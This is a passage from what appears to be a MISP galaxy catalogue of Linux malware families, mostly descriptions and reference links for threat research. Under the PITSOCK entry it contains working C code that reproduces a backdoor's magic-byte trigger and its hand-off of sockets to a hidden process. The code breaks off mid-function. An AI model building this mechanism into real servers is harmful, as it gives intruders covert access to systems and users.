- https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-january-to-june-2025/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ - webarchive
- https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ - webarchive
- https://github.com/jgamblin/Mirai-Source-Code - webarchive
- https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/ - webarchive
- https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet - webarchive
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ - webarchive
- https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/ - webarchive
- http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ - webarchive
- https://isc.sans.edu/diary/22786 - webarchive
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - webarchive
- https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/ - webarchive
- https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ - webarchive
- https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/ - webarchive
- https://blog.netlab.360.com/new-mirai-variant-with-dga/ - webarchive
- https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/ - webarchive
- https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18 - webarchive
- https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2020-17496/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/ - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ - webarchive
- https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/ - webarchive
- https://www.youtube.com/watch?v=fei0mN7pkvA&t=10s - webarchive
- https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/ - webarchive
- https://cert.gov.ua/article/37139 - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot - webarchive
- https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/ - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-mukashi/ - webarchive
- https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/ - webarchive
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - webarchive
- https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine - webarchive
- https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html - webarchive
- https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group - webarchive
- https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jul-Dec%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/ - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
- https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign - webarchive
- https://www.greynoise.io/blog/new-ddos-botnet-discovered - webarchive
- https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet - webarchive
- https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space - webarchive
- https://synthesis.to/2021/06/30/automating_string_decryption.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mokes (ELF)
Internal MISP references
UUID 6d5a5357-4126-4950-b8c3-ee78b1172217 which can be used as unique global reference for Mokes (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Momentum
Internal MISP references
UUID aaf8ce1b-3117-47c6-b756-809538ac8ff2 which can be used as unique global reference for Momentum in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Monti
A ransomware, derived from the leaked Conti source code.
Internal MISP references
UUID 7df77b77-00dd-4eba-a697-b9a7be262acc which can be used as unique global reference for Monti in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MooBot
Internal MISP references
UUID cd8deffe-eb0b-4451-8a13-11f6d291064a which can be used as unique global reference for MooBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot - webarchive
- https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian - webarchive
- https://unit42.paloaltonetworks.com/moobot-d-link-devices/ - webarchive
- https://github.com/blackorbird/APT_REPORT/blob/master/APT28/APT28%20the%20long%20hand%20of%20Russian%20interests.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
- https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b - webarchive
- https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF - webarchive
- https://blog.netlab.360.com/ddos-botnet-moobot-en/ - webarchive
- https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Moose
Internal MISP references
UUID 7fdb91ea-52dc-499c-81f9-3dd824e2caa0 which can be used as unique global reference for Moose in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose - webarchive
- https://web-assets.esetstatic.com/wls/2015/05/Dissecting-LinuxMoose.pdf - webarchive
- http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf - webarchive
- http://www.welivesecurity.com/2015/05/26/moose-router-worm/ - webarchive
- http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mozi
Mozi is an IoT botnet that uses P2P communication and reuses source code from other well-known malware families, including Gafgyt, Mirai, and IoT Reaper.
Internal MISP references
UUID 236ba358-4c70-434c-a7ac-7a31e76c398a which can be used as unique global reference for Mozi in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi - webarchive
- https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/ - webarchive
- https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/ - webarchive
- https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/ - webarchive
- https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/ - webarchive
- https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf - webarchive
- https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave - webarchive
- https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/ - webarchive
- https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet - webarchive
- https://www.youtube.com/watch?v=cDFO_MRlg3M - webarchive
- https://blog.netlab.360.com/mozi-another-botnet-using-dht/ - webarchive
- https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ - webarchive
- https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MrBlack
MrBlack, first identified in May 2014 by the Russian security firm Dr. Web, is a Linux botnet designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack that the company attributed to traffic from tens of thousands of small office/home office (SOHO) routers infected with MrBlack. The botnet spanned more than 109 countries, with the heaviest concentrations in Thailand and Brazil.
MrBlack scans for and infects routers whose default login credentials have not been changed and that expose HTTP and SSH remotely on ports 80 and 22, respectively. One of the most affected router brands is Ubiquiti, a U.S.-based vendor that sells networking equipment in bulk to internet service providers, who lease it to their customers. Once a router is compromised and MrBlack is installed, the bot contacts a remote server and transmits system information about the device; the server can then issue commands to perform various types of DDoS attacks, download and execute files, and terminate processes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MrBlack.
| Known Synonyms |
|---|
AESDDoS |
Dofloo |
Internal MISP references
UUID fc047e32-9cf2-4a92-861a-be882efd8a50 which can be used as unique global reference for MrBlack in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack - webarchive
- https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf - webarchive
- https://blog.syscall.party/post/aes-ddos-analysis-part-1/ - webarchive
- https://news.drweb.com/?i=5760&c=23&lng=en - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mumblehard
Internal MISP references
UUID 5f78127b-25d3-4f86-8a64-f9549b2db752 which can be used as unique global reference for Mumblehard in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Nextcry
Ransomware used against Linux servers.
Internal MISP references
UUID 7ec8a41f-c72e-4832-a5a4-9d7380cea083 which can be used as unique global reference for Nextcry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ngioweb (ELF)
Internal MISP references
UUID a4ad242c-6fd0-4b1d-8d97-8f48150bf242 which can be used as unique global reference for Ngioweb (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb - webarchive
- https://levelblue.com/blogs/labs-research/ngioweb-remains-active-7-years-later - webarchive
- https://www.trendmicro.com/en_in/research/24/e/router-roulette.html - webarchive
- https://twitter.com/IntezerLabs/status/1324346324683206657 - webarchive
- https://blog.lumen.com/one-sock-fits-all-the-use-and-abuse-of-the-nsocks-botnet/ - webarchive
- https://www.trendmicro.com/de_de/research/24/k/water-barghest.html - webarchive
- https://www.trendmicro.com/pt_br/research/24/k/water-barghest.html - webarchive
- https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/ - webarchive
- https://www.trendmicro.com/en_us/research/24/k/water-barghest.html - webarchive
- https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Nimbo-C2 (ELF)
According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).
Internal MISP references
UUID 5dbdf2ea-a15b-4ad6-bf7a-a030998c66b4 which can be used as unique global reference for Nimbo-C2 (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NiuB
Golang-based RAT that offers execution of shell commands and a download-and-execute capability.
Internal MISP references
UUID 7c516b66-f4a4-406a-bf35-d898ac8bffec which can be used as unique global reference for NiuB in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NoaBot
Internal MISP references
UUID b5ee45a0-d75b-40e7-b737-3cfa1cc8246c which can be used as unique global reference for NoaBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Nood RAT
Internal MISP references
UUID 59ac87c0-f2ce-4e83-83bd-299e123b72a7 which can be used as unique global reference for Nood RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Nosedive
According to Black Lotus Labs, Nosedive is a custom variation of the Mirai implant that is supported on all major SOHO and IoT architectures (e.g. MIPS, ARM, SuperH, PowerPC, etc.). Nosedive implants are typically deployed from Tier 2 payload servers in the Raptor Train infrastructure through a unique URL encoding scheme and domain injection method. Nosedive droppers use this method to request payloads for specific C2s by encoding the requested C2 domain and joining it with a unique "key" that identifies the bot and the target architecture of the compromised device (e.g. MIPS, ARM, etc.), which is then injected into the Nosedive implant payload that is deployed to the Tier 1 node. Once deployed, Nosedive runs in-memory only and allows the operators to execute commands, upload and download files, and run DDoS attacks on compromised devices.
The malware and its associated droppers are memory-resident only and deleted from disk. This, in addition to anti-forensics techniques employed on these devices including the obfuscation of running process names, compromising devices through a multi-stage infection chain, and killing remote management processes, makes detection and forensics much more difficult.
Internal MISP references
UUID 13840bb0-494d-403e-a37d-65cf144d71e9 which can be used as unique global reference for Nosedive in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.nosedive - webarchive
- https://assets.lumen.com/is/content/Lumen/raptor-train-handbook-copy - webarchive
- https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF - webarchive
- https://www.justice.gov/d9/2024-09/redacted_24-mj-1484_signed_search_and_seizure_warrant_for_disclosure.pdf - webarchive
- https://blog.lumen.com/derailing-the-raptor-train/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NOTROBIN
FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NOTROBIN.
| Known Synonyms |
|---|
remove_bds |
Internal MISP references
UUID aaeb76b3-3885-4dc6-9501-4504fed9f20b which can be used as unique global reference for NOTROBIN in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin - webarchive
- https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/ - webarchive
- https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/ - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/ - webarchive
- https://news.sophos.com/en-us/2020/05/21/asnarok2/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html - webarchive
- https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OrBit
According to Stormshield, OrBit is two-stage malware that appeared in July 2022 and was discovered by Intezer. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable that serves as a dropper and a dynamic library.
Internal MISP references
UUID ae9d84f2-60e5-4a33-98f4-a0061938ec6d which can be used as unique global reference for OrBit in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Owari
Mirai variant by actor "Anarchy" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.
Internal MISP references
UUID ec67f206-6464-48cf-a012-3cdfc1278488 which can be used as unique global reference for Owari in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari - webarchive
- https://twitter.com/ankit_anubhav/status/1019647993547550720 - webarchive
- https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/ - webarchive
- https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/ - webarchive
- https://twitter.com/hrbrmstr/status/1019922651203227653 - webarchive
- https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863 - webarchive
- https://twitter.com/360Netlab/status/1019759516789821441 - webarchive
- https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
p0sT5n1F3r
According to Yarix digital security, this is malware that sniffs HTTPS traffic, implemented as an Apache module.
Internal MISP references
UUID cc48c6ae-d274-4ad0-b013-bd75041a20c8 which can be used as unique global reference for p0sT5n1F3r in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
P2Pinfect
P2Pinfect is a fast-growing multi-platform botnet whose purpose is still unknown. Written in Rust, it runs on Windows and Linux, including a MIPS variant for Linux-based routers and IoT devices. It is capable of brute-forcing SSH logins and exploiting Redis servers in order to propagate itself, both to random IPs on the internet and to hosts it finds referenced in files present on the infected system.
Internal MISP references
UUID 31a32308-7034-4419-b1f3-56a4d64b4358 which can be used as unique global reference for P2Pinfect in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.p2pinfect - webarchive
- https://www.cadosecurity.com/blog/from-dormant-to-dangerous-p2pinfect-evolves-to-deploy-new-ransomware-and-cryptominer - webarchive
- https://www.cadosecurity.com/cado-security-labs-researchers-witness-a-600x-increase-in-p2pinfect-traffic/ - webarchive
- https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/ - webarchive
- https://www.cadosecurity.com/redis-p2pinfect/ - webarchive
- https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/ - webarchive
- https://www.nozominetworks.com/blog/p2pinfect-worm-evolves-to-target-a-new-platform - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
pbot
P2P botnet derived from the Mirai source code.
Internal MISP references
UUID 7aff049d-9326-466d-bbcc-d62da673b32c which can be used as unique global reference for pbot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Penquin Turla
Internal MISP references
UUID 262e0cf2-2fed-4d37-8d7a-0fd62c712840 which can be used as unique global reference for Penquin Turla in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla - webarchive
- https://securelist.com/big-threats-using-code-similarity-part-1/97239/ - webarchive
- https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf - webarchive
- https://twitter.com/juanandres_gs/status/944741575837528064 - webarchive
- https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf - webarchive
- https://www.youtube.com/watch?v=JXsjRUxx47E - webarchive
- https://lab52.io/blog/looking-for-penquins-in-the-wild/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180251/Penquins_Moonlit_Maze_PDF_eng.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf - webarchive
- https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
perfctl
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular perfctl.
| Known Synonyms |
|---|
perfcc |
Internal MISP references
UUID 5a4408f2-6ee3-4c82-9ee2-a1b4290666be which can be used as unique global reference for perfctl in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.perfctl - webarchive
- https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking - webarchive
- https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PerlBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PerlBot.
| Known Synonyms |
|---|
DDoS Perl IrcBot |
ShellBot |
Internal MISP references
UUID 24b77c9b-7e7e-4192-8161-b6727728170f which can be used as unique global reference for PerlBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot - webarchive
- https://asec.ahnlab.com/en/54647/ - webarchive
- https://twitter.com/Nocturnus/status/1308430959512092673 - webarchive
- https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf - webarchive
- https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/ - webarchive
- https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2020-17496/ - webarchive
- https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/ - webarchive
- https://asec.ahnlab.com/en/49769/ - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
- https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf - webarchive
- https://sysdig.com/blog/malware-analysis-shellbot-sysdig/ - webarchive
- https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html - webarchive
- https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://sysdig.com/blog/rubycarp-romanian-botnet-group/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Persirai
Internal MISP references
UUID 2ee05352-3d4a-448b-825d-9d6c10792bf7 which can be used as unique global reference for Persirai in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PG_MEM
Internal MISP references
UUID 74ffa404-9082-4db9-ac19-18a875db9fe7 which can be used as unique global reference for PG_MEM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PigmyGoat
Internal MISP references
UUID fcdcdc68-4c82-4d3d-aef1-96eac0a62761 which can be used as unique global reference for PigmyGoat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PingPull
Internal MISP references
UUID 65a7944c-15d9-4ca5-8561-7c97b18684c8 which can be used as unique global reference for PingPull in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pink
A botnet with P2P and centralized C&C capabilities.
Internal MISP references
UUID 67063764-a47c-4058-9cb2-1685ffa14fe8 which can be used as unique global reference for Pink in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PITFUEL
According to Mandiant, this is a SparkGateway plugin that loads LITTLELAMB.WOOLTEA through JNI.
Internal MISP references
UUID af5d3d2c-6cb4-4890-8f06-fa76c9d684e8 which can be used as unique global reference for PITFUEL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PITHOOK
According to Mandiant, PITHOOK hooks the accept and accept4 functions within the web process by modifying the PLT. When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward it to PITSTOP over the Unix domain socket /data/runtime/cockpit/wd.fd.
Internal MISP references
UUID 666aa489-0e84-4f7e-a513-f3f13c18ac43 which can be used as unique global reference for PITHOOK in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PITSOCK
According to Mandiant, this is a backdoor that hooks the accept and setsockopt functions of the web process by modifying its procedure linkage table (PLT). This enables backdoor communication via the Unix socket /tmp/clientsDownload.sock when the incoming buffer begins with a specific 48-byte magic byte sequence.
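The hand-off mechanism that PITHOOK (above) and PITSOCK share, as an added example written for this page and not code from Mandiant or from the implants themselves: an accept()-side wrapper peeks at the first bytes of a new connection, and if they match a magic sequence it passes a duplicate of the live socket to a second process over a Unix domain socket using SCM_RIGHTS. The 8-byte magic value, the function names, and the use of socketpair() in place of the named sockets Mandiant documents (/data/runtime/cockpit/wd.fd, /tmp/clientsDownload.sock) are this example's own assumptions; the PLT patching that installs the wrapper is not shown.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Hypothetical 8-byte trigger chosen for this example; the real implants use
 * their own sequences (Mandiant reports a 48-byte one for PITSOCK). */
static const unsigned char MAGIC[8] = {0xDE,0xAD,0xBE,0xEF,0x13,0x37,0xC0,0xDE};

/* Peek at the first bytes of a new connection without consuming them, so a
 * legitimate client's request still reaches the web server intact.
 * Returns 1 if the stream starts with MAGIC, 0 otherwise. */
int starts_with_magic(int fd)
{
    unsigned char buf[sizeof MAGIC];
    ssize_t n = recv(fd, buf, sizeof buf, MSG_PEEK);
    return n == (ssize_t)sizeof buf && memcmp(buf, MAGIC, sizeof buf) == 0;
}

/* Pass a duplicate of `fd` to the peer of `chan` with SCM_RIGHTS: the kernel
 * installs a new descriptor in the receiver that refers to the same open
 * socket, which is how a hook inside the web process hands a live client
 * connection to a separate backdoor process. Returns 0 on success, -1 on error. */
int send_fd(int chan, int fd)
{
    char tag = 'F';
    struct iovec iov = { .iov_base = &tag, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    memset(&u, 0, sizeof u);
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = u.buf, .msg_controllen = sizeof u.buf };
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type  = SCM_RIGHTS;
    c->cmsg_len   = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd, sizeof(int));
    return sendmsg(chan, &msg, 0) == 1 ? 0 : -1;
}

/* Receive a descriptor passed with SCM_RIGHTS. Returns the new fd or -1. */
int recv_fd(int chan)
{
    char tag;
    struct iovec iov = { .iov_base = &tag, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    memset(&u, 0, sizeof u);
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = u.buf, .msg_controllen = sizeof u.buf };
    if (recvmsg(chan, &msg, 0) != 1) return -1;
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    if (!c || c->cmsg_level != SOL_SOCKET || c->cmsg_type != SCM_RIGHTS) return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(c), sizeof(int));
    return fd;
}

/* What a hooked accept() does with each new connection: magic-prefixed
 * streams go to the backdoor over the Unix channel, everything else is
 * returned to the server untouched. Returns 1 if handed off, else 0. */
int dispatch(int conn, int chan)
{
    if (!starts_with_magic(conn)) return 0;
    return send_fd(chan, conn) == 0 ? 1 : 0;
}

/* Self-contained run using socketpair() for both the client connection and
 * the hook<->backdoor channel. Returns the number of bytes the backdoor side
 * reads through the forwarded descriptor when the constructed payload carries
 * MAGIC, 0 when a benign request is left for the server intact, -1 on failure. */
int demo(int with_magic)
{
    int client[2], chan[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, client) < 0) return -1;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, chan) < 0) return -1;

    unsigned char payload[32];      /* constructed input for the demo */
    size_t len;
    if (with_magic) {
        memcpy(payload, MAGIC, sizeof MAGIC);
        memcpy(payload + sizeof MAGIC, "cmd", 3);
        len = sizeof MAGIC + 3;
    } else {
        const char *req = "GET / HTTP/1.1\r\n";
        len = strlen(req);
        memcpy(payload, req, len);
    }
    if (send(client[0], payload, len, 0) != (ssize_t)len) return -1;

    int result;
    unsigned char got[32];
    if (dispatch(client[1], chan[0])) {
        int fwd = recv_fd(chan[1]);
        if (fwd < 0) return -1;
        ssize_t n = recv(fwd, got, sizeof got, 0);   /* MAGIC was only peeked */
        close(fwd);
        result = (int)n;
    } else {
        /* Benign path: the server must still see the full, unmodified request. */
        ssize_t n = recv(client[1], got, sizeof got, 0);
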